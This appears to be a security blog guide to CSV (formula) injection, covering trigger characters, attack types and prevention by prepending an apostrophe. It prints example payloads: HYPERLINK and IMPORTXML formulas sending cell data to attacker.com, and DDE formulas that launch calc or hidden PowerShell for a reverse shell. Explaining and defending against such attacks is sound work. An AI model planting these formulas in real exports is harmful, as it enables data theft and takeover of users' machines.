What is CSV Injection (Formula Injection)? Ways to Exploit, Examples and Impact

Comprehensive guide to CSV Injection (Formula Injection). Learn how attackers exploit spreadsheets and how to prevent these attacks in your applications.

What is CSV Injection (Formula Injection)? Ways to Exploit, Examples and Impact

CSV Injection, also known as Formula Injection, is a sophisticated security vulnerability that occurs when a web application exports untrusted user input into a CSV (Comma-Separated Values) file without proper sanitization. While CSV files are often viewed as simple, harmless text files, modern spreadsheet applications like Microsoft Excel, Google Sheets, and LibreOffice Calc treat cells starting with specific characters as executable formulas. This behavior can be weaponized by attackers to execute arbitrary commands, exfiltrate sensitive data, or launch phishing attacks against unsuspecting users who open the exported file.

Understanding the Basics of CSV Injection

At its core, CSV Injection is not a vulnerability in the spreadsheet software itself, but rather a failure of the web application to treat user-provided data as literal text. Spreadsheet programs are designed to be powerful; they include features that allow cells to perform calculations, fetch data from external URLs, or even interact with the underlying operating system.

When a spreadsheet application encounters a cell starting with one of the following four characters, it interprets the content as a formula:

  • Equals sign (=)
  • Plus sign (+)
  • Minus sign (-)
  • At symbol (@)

If an attacker can inject a string starting with these characters into a database—perhaps through a profile name, a comment field, or an order description—and that data is later exported into a CSV report for an administrator or another user, the spreadsheet software will execute the payload the moment the file is opened.

Why is CSV Injection Dangerous?

Many organizations rely on CSV exports for auditing, financial reporting, and data analysis. Because users generally trust files coming from their own internal systems, they are likely to click through the security warnings that spreadsheet software might display. This trust makes CSV Injection a potent vector for social engineering and initial access into a corporate network.

Common Triggers and Spreadsheet Behavior

To understand how to exploit or prevent this vulnerability, we must look at how different characters trigger formula execution.

The Equals Sign (=)

This is the most common trigger. It tells the spreadsheet to evaluate the following expression. For example, =SUM(A1:A10) is a legitimate formula, but =1+1 is equally valid. An attacker might use =HYPERLINK("http://attacker.com", "Click for Info") to trick a user.

The Plus (+) and Minus (-) Signs

Spreadsheet engines often treat these as mathematical operators. If a cell contains +1+1, Excel will automatically convert it to =1+1 and display 2. Attackers use these as alternatives to the equals sign to bypass poorly implemented filters that only check for =.

The At Symbol (@)

In older versions of Excel and in some specific functions of Lotus 1-2-3, the @ symbol was used to call functions. Modern Excel still supports this for compatibility, meaning @SUM(A1:A10) will be treated as a formula.

Ways to Exploit CSV Injection

There are three primary ways an attacker can leverage CSV Injection: Data Exfiltration, Social Engineering (Phishing), and Remote Code Execution (RCE).

This is the most common and reliable form of CSV Injection. The goal is to steal data from other cells within the spreadsheet and send it to an attacker-controlled server.

Payload Example:

=HYPERLINK("http://attacker.com/logger?leak=" & A2 & "_" & B2, "Error: Click to Fix")

In this scenario, if the CSV contains sensitive information in cells A2 (e.g., a username) and B2 (e.g., a password or PII), the formula concatenates them and appends them to a URL. When the victim clicks the link, the sensitive data is sent directly to the attacker's web logs.

2. Remote Code Execution (RCE) via DDE

Dynamic Data Exchange (DDE) is a legacy Microsoft protocol that allows applications to share data. While Microsoft has introduced several security patches to limit DDE, it can still be exploited in certain environments or older versions of Excel to launch system commands.

Payload Example (Launching Calculator):

=cmd|' /C calc'!A0

In a real attack, the payload wouldn't just launch calc.exe. It would likely be a PowerShell command designed to download and execute a reverse shell:

=cmd|' /c powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -ENCODED_COMMAND <Base64_Payload>'!A0

When the user opens the file, Excel will prompt them with two warnings: one about updating links and another about starting a system application. If the user clicks "Yes" to both, the attacker gains full control over the machine.

3. Google Sheets Exploitation (IMPORTXML)

Google Sheets handles formulas differently because the execution happens on Google's servers, not the local machine. However, functions like IMPORTXML or IMPORTFEED can be used to perform Out-of-Band (OOB) data exfiltration.

Payload Example:

=IMPORTXML(CONCAT("http://attacker.com/log?data=", CONCATENATE(A1:E1)), "//a")

This formula takes the data from cells A1 through E1, appends it to a URL, and makes a request to the attacker's server to "import" XML data. The attacker doesn't care about the XML; they only care about the data leaked in the URL parameters.

Real-World Impact and Severity

The impact of CSV Injection varies depending on the context of the application. In a multi-tenant SaaS platform, an attacker could register an account with a malicious payload as their "Company Name." When the platform administrator exports a monthly billing report, the attacker's payload executes on the administrator's workstation.

Because this can lead to full system compromise (via RCE) or large-scale data breaches (via exfiltration), many security researchers classify it as a High-severity finding. However, some bug bounty programs treat it as a Medium-severity issue because it requires significant user interaction (clicking through warnings).

How to Prevent CSV Injection

Preventing CSV Injection requires a shift in how developers handle data exports. Simply blacklisting the = character is insufficient, as attackers can use @, +, or - to trigger the same behavior.

The Best Practice: Prepending an Apostrophe

The most effective way to neutralize CSV Injection is to prepend a single quote (apostrophe) character (') to any cell that starts with a suspicious character. Spreadsheet applications treat a leading apostrophe as a directive to handle the rest of the cell content as literal text, not as a formula. The apostrophe itself is usually not displayed to the user.

Secure Export Logic (Pseudocode):

def sanitize_for_csv(input_string):
    trigger_chars = ('=', '+', '-', '@')
    if input_string.startswith(trigger_chars):
        return "'" + input_string
    return input_string

Input Validation vs. Output Encoding

While you should always validate user input, CSV Injection is an output encoding problem. You cannot always block users from starting a field with a minus sign (e.g., a legitimate negative number or a dash in a username). Therefore, the sanitization must happen at the moment the CSV is generated, ensuring that the data is safely wrapped for the target format.

Additional Defensive Layers

  1. User Education: Warn users that CSV files can contain active content and that they should never click "Yes" on security prompts regarding DDE or external links unless they are certain of the file's origin.
  2. Content Security Policy (CSP): While CSP doesn't stop Excel from executing, it can help prevent web-based exfiltration if the "CSV" is actually being rendered in a browser-based spreadsheet viewer.
  3. Use Alternative Formats: If possible, offer data exports in JSON or XML formats, which do not have the same inherent formula execution risks as CSV/XLSX.

Conclusion

CSV Injection is a subtle but dangerous vulnerability that bridges the gap between web application security and desktop software exploitation. By understanding how spreadsheet engines interpret special characters, attackers can turn a simple data export feature into a powerful weapon for data theft and system compromise. Developers must take responsibility for sanitizing exports, ensuring that user-provided data remains just that—data, not code.

To proactively monitor your organization's external attack surface and catch exposures before attackers do, try Jsmon.